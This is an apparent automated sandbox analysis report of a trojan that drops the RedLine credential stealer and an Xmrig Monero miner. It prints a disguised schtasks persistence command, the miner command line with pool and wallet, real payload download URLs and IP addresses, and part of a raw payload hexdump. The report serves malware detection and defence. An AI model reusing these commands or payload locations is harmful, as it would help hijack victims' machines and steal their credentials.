Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.GenericKD.45754886.17334.7781

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.GenericKD.45754886.17334.7781 (renamed file extension from 7781 to exe)
Analysis ID:356837
MD5:bc584a3be92cfdfda79446372fffa46d
SHA1:6f7d11b7c795bd1f48a078f05d8a4c5600448a03
SHA256:8086d2b05316a9b44f55971a6c90da8ecb069d075973654f5f914229dc3070f6
Infos:

Most interesting Screenshot:

Detection

RedLine Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
Binary contains a suspicious time stamp
Connects to a pastebin service (likely for C&C)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Hides threads from debuggers
Machine Learning detection for dropped file
May check the online IP address of the machine
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe (PID: 2100 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe' MD5: BC584A3BE92CFDFDA79446372FFFA46D)
    • pg2bsuqa.exe (PID: 6124 cmdline: 'C:\Users\user\AppData\Local\pg2bsuqa.exe' MD5: 70DCA411445D3B4394D9C467BF3FF994)
    • zmql3v0y.exe (PID: 4012 cmdline: 'C:\Users\user\AppData\Local\zmql3v0y.exe' MD5: F0ECEFED65B00699CC2B57BF81492F56)
      • schtasks.exe (PID: 6484 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cpu.exe (PID: 6624 cmdline: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1 MD5: E95F766A3748042EFBF0F05D823F82B7)
        • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RantimeBroker.exe (PID: 6552 cmdline: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe MD5: F0ECEFED65B00699CC2B57BF81492F56)
  • RantimeBroker.exe (PID: 1632 cmdline: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe MD5: F0ECEFED65B00699CC2B57BF81492F56)
  • cleanup

Malware Configuration

Threatname: Xmrig

{"WALLET": "42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j", "POOL": "pool.minexmr"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Windows\CPU\config.jsonJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmpCoinMiner_StringsDetects mining pool protocol string in ExecutableFlorian Roth
    • 0x35a9:$s1: stratum+tcp://
    00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmpCoinMiner_StringsDetects mining pool protocol string in ExecutableFlorian Roth
      • 0x5250:$s1: stratum+tcp://
      • 0x52e0:$s1: stratum+tcp://
      • 0x847f:$s1: stratum+tcp://
      • 0xa523:$s1: stratum+tcp://
      00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          Click to see the 14 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.2.zmql3v0y.exe.b30000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            15.2.RantimeBroker.exe.d80000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: XmrigShow sources
              Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1, CommandLine: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe, NewProcessName: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\zmql3v0y.exe' , ParentImage: C:\Users\user\AppData\Local\zmql3v0y.exe, ParentProcessId: 4012, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1, ProcessId: 6624

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus detection for URL or domainShow sources
              Source: https://blog.agencia10x.com/dance.exeAvira URL Cloud: Label: malware
              Source: https://blog.agencia10x.com/mex.exeAvira URL Cloud: Label: malware
              Found malware configurationShow sources
              Source: cpu.exe.6624.16.memstrMalware Configuration Extractor: Xmrig {"WALLET": "42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j", "POOL": "pool.minexmr"}
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeMetadefender: Detection: 21%Perma Link
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeReversingLabs: Detection: 65%
              Source: C:\Users\user\AppData\Local\zmql3v0y.exeReversingLabs: Detection: 60%
              Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeMetadefender: Detection: 16%Perma Link
              Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeReversingLabs: Detection: 65%
              Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeReversingLabs: Detection: 60%
              Multi AV Scanner detection for submitted fileShow sources
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeMetadefender: Detection: 21%Perma Link
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeReversingLabs: Detection: 28%
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\user\AppData\Local\pg2bsuqa.exeJoe Sandbox ML: detected

              Bitcoin Miner:

              barindex
              Yara detected Xmrig cryptocurrency minerShow sources
              Source: Yara matchFile source: 00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.328721362.0000000003CD1000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000003.324849643.0000020FCC35B000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.282484459.0000000001AC0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000003.317443395.00000000015F0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.318537012.0000000003391000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: cpu.exe PID: 6624, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: zmql3v0y.exe PID: 4012, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RantimeBroker.exe PID: 6552, type: MEMORY
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows\CPU\config.json, type: DROPPED
              Source: Yara matchFile source: 6.2.zmql3v0y.exe.b30000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.RantimeBroker.exe.d80000.0.unpack, type: UNPACKEDPE
              Detected Stratum mining protocolShow sources
              Source: global trafficTCP traffic: 192.168.2.5:49731 -> 88.99.193.240:4444 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42zyh6myztcdlqfmcpscggn8ppdku4pk16kh8uffytesddfwt5ihd2qfsws2bgnuwxwfnrtbjbr5w7dqgebrzdjcuzia53j./","pass":"x","agent":"xmrig/6.8.0 (windows nt 10.0; win64; x64) libuv/1.40.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/wrkz","astrobwt"]}}.
              Found strings related to Crypto-MiningShow sources
              Source: zmql3v0y.exeString found in binary or memory: -o stratum+tcp://
              Source: zmql3v0y.exeString found in binary or memory: -o stratum+tcp://
              Source: zmql3v0y.exeString found in binary or memory: pool.minexmr.com:4444

              Compliance:

              barindex
              Uses 32bit PE filesShow sources
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Uses secure TLS version for HTTPS connectionsShow sources
              Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49730 version: TLS 1.2
              Binary contains paths to debug symbolsShow sources
              Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278594567.00000000002F0000.00000040.00020000.sdmp, zmql3v0y.exe, 00000006.00000002.520873342.0000000000B40000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000F.00000002.319896827.0000000000D90000.00000040.00020000.sdmp
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.6.dr

              Networking:

              barindex
              Connects to a pastebin service (likely for C&C)Show sources
              Source: unknownDNS query: name: pastebin.com
              May check the online IP address of the machineShow sources
              Source: unknownDNS query: name: iplogger.org
              Source: unknownDNS query: name: iplogger.org
              Source: global trafficTCP traffic: 192.168.2.5:49731 -> 88.99.193.240:4444
              Source: global trafficHTTP traffic detected: GET /cpu.zip HTTP/1.1Host: 195.2.84.91Connection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 104.23.99.190 104.23.99.190
              Source: Joe Sandbox ViewIP Address: 104.23.99.190 104.23.99.190
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: unknownTCP traffic detected without corresponding DNS query: 195.2.84.91
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 23 Feb 2021 16:37:53 GMTContent-Type: application/zipContent-Length: 6296834Connection: keep-aliveKeep-Alive: timeout=60Last-Modified: Sat, 20 Feb 2021 21:11:22 GMTETag: "601502-5bbcb02b93280"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 01 7a 3a 52 67 77 19 1f bf 02 00 00 e3 08 00 00 0b 00 00 00 63 6f 6e 66 69 67 2e 6a 73 6f 6e ad 56 c9 6e db 30 10 bd e7 2b 02 9d 43 d7 76 e1 16 e8 2d 40 72 4b 51 20 69 51 14 45 61 8c a9 b1 c4 9a e2 b0 43 ca 4b 8b fc 7b 49 79 89 44 d3 45 0e 95 01 43 9a c7 19 3d 3e ce a2 3f 57 d7 e1 2a c0 aa e2 c3 f5 fe a1 33 a8 32 3c 9b 56 eb 9b 17 db 86 78 85 2c 4e 50 87 3c ef 17 14 b5 f7 76 18 02 0d 2c 34 c6 c5 4b d0 0e 7b 81 6a 72 3e 98 8b c9 f4 fd 68 1c 7e 93 a2 07 5a e2 08 8e 7b 26 90 12 9d 13 9e 56 68 ce 69 31 3a cf 4a fa ee 55 9e 5b 1c f0 82 d6 93 83 35 1e b0 83 75 01 72 55 31 b5 26 a1 57 48 d2 c4 6e bf f8 68 f3 ca eb c4 9f c1 94 d4 6c 13 cd 8c 8a cc c5 e4 66 68 13 b0 de 4e 53 a0 a1 32 c6 ec f8 f5 b7 3f a9 16 c2 42 85 2e a3 1b 97 8d e3 01 91 ce bc e1 ac 59 82 ac 71 fe 8b 72 91 4c db c0 b9 87 93 0c 5e d6 16 ca b9 65 5c 62 b8 9f 1f 78 4e 06 a2 4a db 5e 3a eb 24 64 dd 56 78 da cf 45 4c fc 54 3e 97 27 1b 01 e8 ce 4f dc b2 22 56 7e 77 8e 34 d8 10 ef 84 25 d2 99 78 3b 85 3a c3 b1 81 ad f0 35 23 94 4e d4 ca 44 26 93 f1 20 ff 5c 73 ee 05 5c 91 99 0a d5 58 9d f0 e8 3c 3c d3 62 e3 45 8c ed d4 ef 28 e1 6c d6 8f 29 cd 9b 71 86 a2 34 42 2b 8f 59 6c 05 1b 4b 9b 23 30 38 10 b2 68 a4 7e 6d fd 75 99 71 be 23 4d 50 22 67 e4 d6 e0 97 c4 51 83 e2 f6 e3 5d 3f 5b a1 d4 99 c4 fb c7 d6 fa 5b 1b a6 54 5b c2 6b f9 5f 22 6a d6 cd ff a2 53 92 01 8f 42 e3 1a 63 c8 c9 d0 4c eb d0 07 2d d3 76 d7 c3 34 55 62 a9 34 0e 78 15 31 15 63 0a 7f 3f bd f9 65 8b dd 02 d0 15 ed 5d 0e 2e 2f 0c 49 99 3c d2 72 24 75 60 33 5a 4f 47 db 86 55 35 92 d4 7c 78 1b ae 22 5d ee 3a b5 8a 6f 9f be 3c ce bf de 3e 3c dc 7f 9e df de dd 3d de 3f 3d a5 4b 2d b8 c8 b6 d8 a6 40 88 2f 4e 9d 3f c1 8c 92 58 83 ab 8f 4a 26 f0 0a d1 82 56 6b bc 80 5f 6a 1e 1d e8 3b f5 96 19 b7 80 04 bd 4d 85 6c 79 5f b5 19 6a 25 84 8e 60 2e 44 70 24 57 6e 96 77 74 a8 97 22 fc a1 f4 fd 71 17 af e7 ee ee c7 f1 80 e3 cb 85 57 4d dc de bb 43 89 17 35 82 f6 b5 c8 83 65 a3 92 71 82 61 82 75 9d 6e d6 b3 84 3e 06 e1 e8 7a 56 b7 73 21 cb 92 91 e5 b5 7b 6d e1 84 94 f5 24 f7 09 99 d4 8e 44 f6 79 eb 7c 85 99 4e 2b 95 ad 91 dd 45 a0 0d b5 95 41 cb 30 5d 18 9a dc 17 44 cc 52 11 a6 41 72 94 45 a8 b5 05 75 32 1c f5 db c4 29 35 54 b0 53 4a 90 11 0b f0 1e 79 77 2a ea e7 ab bf 50 4b 03 04 14 00 00 00 08 00 54 22 55 52 75 cb 47 e4 24 f1 5f 00 a8 20 69 00 07 00 00 00 63 70 75 2e 65 78 65 ec 5a 67 38 9c c1 16 5e bd f7 1e ac 2e da 25 11 2d 08 bb ca ea bd 5b 96 d5 3b 57 09 82 20 08 a2 13 bd 44 59 9d e8 65 b5 25 88 84 10 82 88 16 36 ba 10 5c d1 89 bb dc de ef cf fb e3 ce b3 fb 9c ef 9b 79 e7 cc 99 73 e6 9d 6f bf 39 ab 65 9e 0c c0 01 00 00 b8 98 ef f5 35 00 d0 0e f8 43 01 01 fe 73 b9 87 05 00 90 b3 75 90 03 9a 89 46 39 da b1 34 47 39 0c 9d 9c 7d d8 bd bc 3d 1d b
              Source: global trafficHTTP traffic detected: GET /cpu.zip HTTP/1.1Host: 195.2.84.91Connection: Keep-Alive
              Source: unknownDNS traffic detected: queries for: iplogger.org
              Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmpString found in binary or memory: http://195.2.84.91/amd.zip
              Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmpString found in binary or memory: http://195.2.84.91/cpu.zip
              Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmpString found in binary or memory: http://195.2.84.91/nvidia.zip
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: WinRing0x64.sys.6.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
              Source: WinRing0x64.sys.6.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
              Source: WinRing0x64.sys.6.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
              Source: WinRing0x64.sys.6.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
              Source: pg2bsuqa.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280945530.0000000001122000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
              Source: pg2bsuqa.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.com
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280945530.0000000001122000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://ocsp.digicert.com0H
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://ocsp.digicert.com0I
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://ocsp.digicert.com0P
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp, pg2bsuqa.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://ocsp.thawte.com0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://s.symcd.com06
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmpString found in binary or memory: https://blog.agencia10x.com/dance.exe
